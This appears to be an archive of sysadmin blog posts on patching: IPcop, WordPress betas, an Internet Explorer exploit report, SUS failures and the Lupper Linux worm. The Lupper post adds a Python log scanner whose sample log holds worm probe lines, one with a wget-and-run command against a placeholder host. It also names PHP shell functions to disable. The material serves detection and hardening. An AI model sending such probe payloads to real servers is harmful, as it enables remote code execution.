Back from BrainShare and the usual round of patching the internal boxes.

The firewall/spam server got a good round of updates. IPcop had two major updates. Also the ClamAV anti-virus for the mail sweeper got updated to 0.90.1.

There are also a stack of SLES 10 and Windows 2003 updates to test and install. Sigh. Windows 2003 SP2 is now live; I need to check it doesn’t make anything barf. SLES 10 just has the normal slew of packages.

WordPress 2.1 beta 1

Hot on the heels of WordPress 2.0.6 release candidate – is WordPress 2.1 beta 1.

I tried the alpha from subversion on this blog a while ago; it looked promising. Now we are at beta 1.

You can get the beta from here; knowing the test and release team – it will be live in weeks.

ZENworks Podcasts

I recorded a series of podcasts today for the new Novell Communities site.

Usual delays – see posts below – but should be up and posted in mid-February.

Topics for discussion: ZENworks 7, ZENworks Asset Management, Patching and BrainShare 2006.


Internet Explorer – another unpatched vulnerability

SANS are flagging a particularly nasty Internet Explorer problem:

the UK group “Computer Terrorism” released a proof of concept exploit against patched versions of Internet Explorer. We verified that the code is working on a fully patched Windows XP system with default configuration.

The bug uses a problem in the javascript ‘Window()’ function, if run from ‘onload’. ‘onload’ is an argument to the HTML tag, and is used to execute javascript as the page loads.

The Javascript Window() vulnerability has been known for a few months now, but it has so far been treated as a denial of service (DoS) vulnerability. The author of this PoC figured out a way to use this older vulnerability to execute code.

Arbitrary executables may be executed without user interaction. The PoC demo as tested by us will launch the calculator (calc.exe).

In addition to the PoC ‘Calculator’ exploit, a reader (thanks Chris R!) submitted a version that opens a remote shell. The PoC exploit allows for easy copy/paste of various shell code snippets.

In itself, the vulnerability will not escalate privileges. We are trying to verify other exploits at this point.

Turn off JavaScript, or use an alternative browser (Opera, Firefox). If you happen to use Firefox: this bug does not affect Firefox. But others may. For Firefox, the extension ‘NoScript’ can be used to easily allow JavaScript for selected sites only.

Looks nasty. Fully patched Windows XP and IE 6 are at risk from this one; turning off JavaScript is going to break a lot of new sites.

As the man said – make sure you use Firefox or Opera.

Microsoft SUS failures?

It’s another big patch week – and SANS are reporting that Microsoft SUS is having problems:

Microsoft SUS not playing well
Published: 2005-11-09,
Last Updated: 2005-11-09 16:45:28 UTC by Tony Carothers (Version: 2)

Matthew Bailey just provided this input in regards to the SUS problems that are occurring:

“I found this posting at

The SUS 1.0 update cab is delayed today but will be published at ~ 5:00pm PDT today.

The WSUS cab has no delays and has been published.”

We’ve had a busy last ~12 hours. Reports are coming in that Microsoft’s SUS is not updating correctly, causing a lot of readers to have to manually roll out patches. If anybody has found this to not be the case, or found a way to kick SUS into gear, please send us a note, and I’ll get it out to the rest of the world 🙂

Most enterprises that rely on SUS/WSUS for deployment of patches are still on SUS (the older technology). Patching is a pretty important process for enterprises, and the race to patch on time is causing a lot of IT administrator headaches.

For SUS to fail and administrators to have to manually roll out patches is a disaster. I am sure that after this many CIOs will mandate a close look at other options; maybe this will cause them to switch platforms, or at least look at a more robust patch solution.

Lupper – Linux worm

ZDNet and others are flagging a new Linux worm.

Quoting McAfee:

The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed.

There are some well understood methods to minimise this risk.

Practice good security. A good, robust perimeter firewall (I use IPcop), along with a good patch regime, is vital. I (naturally) use ZENworks Linux Management to keep my Linux servers up to date.
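Because the worm described above attacks blindly, its probes show up in the web server access log whether or not the vulnerable script is present. The script below is an added example of the detection side of that; it is not part of the original post or of any Novell or McAfee tool. It parses Apache combined-format log lines and flags requests whose query parameters carry a remote URL (the remote file download the McAfee note mentions) or shell metacharacters (the external shell commands). The log lines are constructed for the example; the worm’s actual target URLs are not reproduced here.

```python
"""Flag blind PHP/CGI remote-file-download and shell-injection probes in an
Apache access log.  Added example, not code from the original post."""
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines (not real traffic; 192.0.2.0/24 is
# documentation address space).  Two are ordinary requests, three are probes.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Nov/2005:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
192.0.2.17 - - [06/Nov/2005:10:01:09 +0000] "GET /cgi-bin/view.cgi?tmpl=http://192.0.2.99/bot.txt? HTTP/1.0" 404 287 "-" "-"
192.0.2.17 - - [06/Nov/2005:10:01:10 +0000] "GET /include/load.php?lib=%68%74%74%70%3a%2f%2f192.0.2.99/x HTTP/1.0" 200 0 "-" "-"
192.0.2.17 - - [06/Nov/2005:10:01:11 +0000] "GET /cgi-bin/stats.pl?cfg=|wget%20http://192.0.2.99/c;sh%20c| HTTP/1.0" 500 0 "-" "-"
10.0.0.8 - - [06/Nov/2005:10:02:00 +0000] "GET /docs/http_guide.html HTTP/1.1" 200 9912 "-" "Mozilla/5.0"
"""

# Request line of the combined log format; everything after the status is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) '
)
# A URL anywhere in a parameter value: the script would fetch it if the
# PHP/CGI environment permits remote file download.
SCHEME_RE = re.compile(r'(?:https?|ftp)://', re.IGNORECASE)
# Characters that only make sense if the value reaches a shell.
SHELL_META = set('|;`')


def classify(target):
    """Return the sorted list of reasons a request target looks like a probe
    ('remote-url', 'shell-meta'), or [] for a benign one."""
    _path, _, query = target.partition('?')
    reasons = set()
    # Split on '&' only and decode each value ourselves, so that a ';' inside
    # a value is seen as shell syntax rather than as a parameter separator.
    for pair in query.split('&'):
        if not pair:
            continue
        _name, _, raw_value = pair.partition('=')
        value = unquote_plus(raw_value)   # undo %xx encoding used to hide http://
        if SCHEME_RE.search(value):
            reasons.add('remote-url')
        if SHELL_META & set(value):
            reasons.add('shell-meta')
    return sorted(reasons)


def scan_log(text):
    """Parse each log line and return a list of findings for the flagged ones."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not combined format; skip, don't crash
        reasons = classify(m['target'])
        if reasons:
            findings.append({
                'ip': m['ip'],
                'target': m['target'],
                'status': int(m['status']),
                'reasons': reasons,
            })
    return findings


def hits_by_source(findings):
    """Count flagged requests per source address; a blind worm produces a
    burst of hits against different scripts from one address."""
    counts = {}
    for f in findings:
        counts[f['ip']] = counts.get(f['ip'], 0) + 1
    return counts


if __name__ == '__main__':
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h['ip'], h['status'], ','.join(h['reasons']), h['target'])
    print('per-source:', hits_by_source(hits))
```

Note that the 404 and 500 responses are still worth alerting on: the probe failing on this host says nothing about the next one. On the PHP side the same two conditions the McAfee note lists are controlled by `allow_url_fopen` (and, on newer PHP, `allow_url_include`) and by listing `exec`, `system`, `passthru`, `shell_exec` and `popen` in `disable_functions` in php.ini; a server that does not need remote includes or shell-outs should have both switched off regardless of patch level.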

One other addition is application hardening – I blogged a while ago about Novell AppArmor – I run this on my outward facing and internal Linux servers. If anything untoward happens – AppArmor is my final line of defence keeping my servers in good health.

[Edit – also to note – keep your applications themselves up to date; if they are RPM-based, ZENworks Linux Management can deliver the updates. My blogging software is WordPress; they posted a note saying the updated versions are not affected.]

Novell patching

I seem to have won the task of writing a short paper on ‘how to update and patch Novell systems in the enterprise’.

I’m working on this in conjunction with my ZENworks 7 Linux Management white paper – which is still being written. (Sorry it’s late – I’m on the road again!)

My summary so far is:

NetWare – use ZENworks Server Management. Deploy CPKs of the Consolidated Support Pack
SLES 8 – use ZENworks Linux Management. Mirror content from a YaST Online Update mirror.
SLES 9 – use ZENworks Linux Management. Mirror content from Note: Make sure you have migrated your SUSE portal account!
NLD 9 – as SLES 9
RHEL – use ZENworks Linux Management. I know it’s not a Novell product – but mirror content from Red Hat Network using your RHN credentials.

There are probably some other platforms I need to add here – small biz server and some applications spring to mind – but I’ll be working off this list.

Comments welcome.